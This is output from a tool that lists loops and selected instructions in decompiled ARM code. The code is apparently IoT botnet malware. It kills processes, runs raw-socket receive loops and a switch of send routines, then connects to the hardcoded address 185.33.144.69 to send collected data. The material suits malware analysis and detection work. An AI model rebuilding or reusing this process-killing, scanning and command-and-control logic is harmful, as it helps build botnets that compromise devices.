		int32_t fd3 = open((char *)path, O_RDONLY); // 0xe85c
		kill(time_val, SIGKILL);
		close(fd5);
		v240 = readdir((struct __dirstream *)dirp);
		v240 = readdir((struct __dirstream *)dirp);
		struct dirent * v275 = readdir((struct __dirstream *)dirp); // 0xe6ac
		v240 = readdir((struct __dirstream *)dirp2);
		v240 = readdir((struct __dirstream *)dirp2);
		v240 = readdir((struct __dirstream *)dirp);
		closedir((struct __dirstream *)dirp);
		closedir((struct __dirstream *)dirp);
=============================WHILE LOOPS ID : 48 @ function_eb60 ====================================
++++++++ WHILE START : 24364 
++++++++ WHILE FUNCTION : function_eb60 
++++++++ WHILE END : 24624 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		int32_t sock;
		if (sock == -1) {
		int32_t sock_fd = socket(AF_INET, SOCK_STREAM, protocol); // 0xf06c
		int32_t fd3 = sock_fd; // r5
		if (sock_fd != -1) {
		fcntl(sock_fd, F_GETFL);
		connect(sock, (struct sockaddr *)&addr, 16);
		uint32_t v263 = sock; // 0xef44
		int32_t v267 = sock; // 0xee70
		send(sock, (int32_t *)&buf2, 2, MSG_NOSIGNAL);
		uint32_t sock2 = sock; // 0xef70
		if (sock2 != -1) {
		if ((v275 >> sock2 % 32) % 2 != 0) {
		int32_t v276 = recv(sock, (int32_t *)&buf2, 2, MSG_PEEK | MSG_NOSIGNAL); // 0xefd0
		__pseudo_cond_branch(sock != -1, (int32_t)&v274);
		sock = -1;
		recv(sock, (int32_t *)&buf2, 2, MSG_NOSIGNAL);
		close(sock);
		int32_t v280 = recv(sock, &buf3, length, MSG_PEEK | MSG_NOSIGNAL); // 0xf028
		recv(sock, (int32_t *)&buf2, 2, MSG_NOSIGNAL);
		recv(sock, &buf3, length2, MSG_NOSIGNAL);
		if ((v285 >> sock2 % 32) % 2 == 0) {
		__pseudo_cond_branch(sock2 != -1, (int32_t)&v274);
		getsockopt(sock2, SO_DEBUG, 4, &option_value, &option_len);
		send(sock, &buf4, 4, MSG_NOSIGNAL);
		send(sock, (int32_t *)&buf2, 1, MSG_NOSIGNAL);
		send(sock, &buf5, length3, MSG_NOSIGNAL);
		close(sock);
=============================WHILE LOOPS ID : 51 @ function_f768 ====================================
++++++++ WHILE START : 26475 
++++++++ WHILE FUNCTION : function_f768 
++++++++ WHILE END : 28356 
++++++++ INTRESTING INSTRUCTIONS :  
		int32_t sock_fd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP); // 0xf834
		sock = sock_fd;
		if (sock_fd == -1) {
		fcntl(sock_fd, F_GETFL);
		fcntl(sock_fd, F_SETFL);
		if (setsockopt(sock, status, 3, &status, 4) != 0) {
		close(sock);
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		uint32_t v238 = recvfrom(sock, &buf, 1514, MSG_NOSIGNAL, NULL, NULL); // 0xfdf8
		while (true) {
		close(fd);
		while (true) {
		int32_t sock18; // 0x10238
		if (sock18 != -1) {
		if ((v263 >> sock18 % 32) % 2 == 0) {
		v261 = sock18;
		while (true) {
		while (true) {
		int32_t sock2; // 0x10400
		int32_t v273 = recv(sock2, (int32_t *)buf2, 256 - v272, MSG_NOSIGNAL); // 0x10410
		close(fd2);
		while (true) {
		case 2: {
		while (true) {
		while (true) {
		int32_t sock3; // 0x10d2c
		send(sock3, &buf3, 3, MSG_NOSIGNAL);
		send(0x4000, (int32_t *)status, 3, MSG_NOSIGNAL);
		send(0x4000, (int32_t *)(int32_t)&buf4, 9, MSG_NOSIGNAL);
		while (true) {
		case 2: {
		while (true) {
		case 3: {
		while (true) {
		int32_t sock4; // 0x105e0
		send(sock4, (int32_t *)buf5, (int32_t)length, MSG_NOSIGNAL);
		int32_t sock5; // 0x105f8
		send(sock5, (int32_t *)"\r\n", 2, MSG_NOSIGNAL);
		case 4: {
		while (true) {
		int32_t sock6; // 0x10678
		send(sock6, (int32_t *)buf6, (int32_t)length2, MSG_NOSIGNAL);
		int32_t sock7; // 0x10690
		send(sock7, (int32_t *)"\r\n", 2, MSG_NOSIGNAL);
		case 5: {
		while (true) {
		int32_t sock8; // 0x10730
		send(sock8, (int32_t *)buf7, length3, MSG_NOSIGNAL);
		int32_t sock9; // 0x10744
		send(sock9, (int32_t *)"\r\n", 2, MSG_NOSIGNAL);
		while (true) {
		while (true) {
		case 6: {
		while (true) {
		int32_t sock10; // 0x10858
		send(sock10, (int32_t *)buf8, length4, MSG_NOSIGNAL);
		int32_t sock11; // 0x1086c
		send(sock11, (int32_t *)"\r\n", 2, MSG_NOSIGNAL);
		case 7: {
		while (true) {
		int32_t sock12; // 0x10b1c
		send(sock12, (int32_t *)buf9, length4, MSG_NOSIGNAL);
		int32_t sock13; // 0x10b30
		send(sock13, (int32_t *)"\r\n", 2, MSG_NOSIGNAL);
		case 8: {
		while (true) {
		int32_t sock14; // 0x109b4
		send(sock14, (int32_t *)buf10, length3, MSG_NOSIGNAL);
		int32_t sock15; // 0x109c8
		send(sock15, (int32_t *)"\r\n", 2, MSG_NOSIGNAL);
		case 9: {
		while (true) {
		int32_t sock16; // 0x10a68
		send(sock16, (int32_t *)buf11, length3, MSG_NOSIGNAL);
		int32_t sock17; // 0x10a7c
		send(sock17, (int32_t *)"\r\n", 2, MSG_NOSIGNAL);
		case 10: {
		int32_t v417 = fork(); // 0x10c84
		int32_t sock_fd2 = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); // 0x10df4
		t = sock_fd2;
		if (sock_fd2 == -1) {
		inet_addr("185.33.144.69");
		if (connect(t, (struct sockaddr *)&addr, 16) == -1) {
		close(t);
		send(t, &length3, 1, MSG_NOSIGNAL);
		send(t, &length4, 4, MSG_NOSIGNAL);
		send(t, &buf12, length5, MSG_NOSIGNAL);
		send(t, (int32_t *)(v314 + 12), 1, MSG_NOSIGNAL);
		send(t, (int32_t *)buf13, (int32_t)length6, MSG_NOSIGNAL);
		send(t, (int32_t *)(v314 + 13), 1, MSG_NOSIGNAL);
		send(t, (int32_t *)buf14, (int32_t)length7, MSG_NOSIGNAL);
		close(t);
		close(fd3);
		close(fd4);
		while (true) {
		case 3: {
		case 4: {
		case 5: {
		case 6: {
		case 7: {
		case 8: {
		case 9: {
		case 10: {
		close(fd2);
		while (true) {
		if ((length4 | getsockopt(sock18, SO_DEBUG, 4, &length4, &length3)) == 0) {
		while (true) {
		close(fd5);
		while (true) {
=============================WHILE LOOPS ID : 80 @ __udivsi3 ====================================
++++++++ WHILE START : 33752 
++++++++ WHILE FUNCTION : __udivsi3 
++++++++ WHILE END : 33964 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 81 @ __umodsi3 ====================================
++++++++ WHILE START : 34467 
++++++++ WHILE FUNCTION : __umodsi3 
++++++++ WHILE END : 34821 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 82 @ __modsi3 ====================================
++++++++ WHILE START : 35131 
++++++++ WHILE FUNCTION : __modsi3 
++++++++ WHILE END : 35511 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		while (true) {
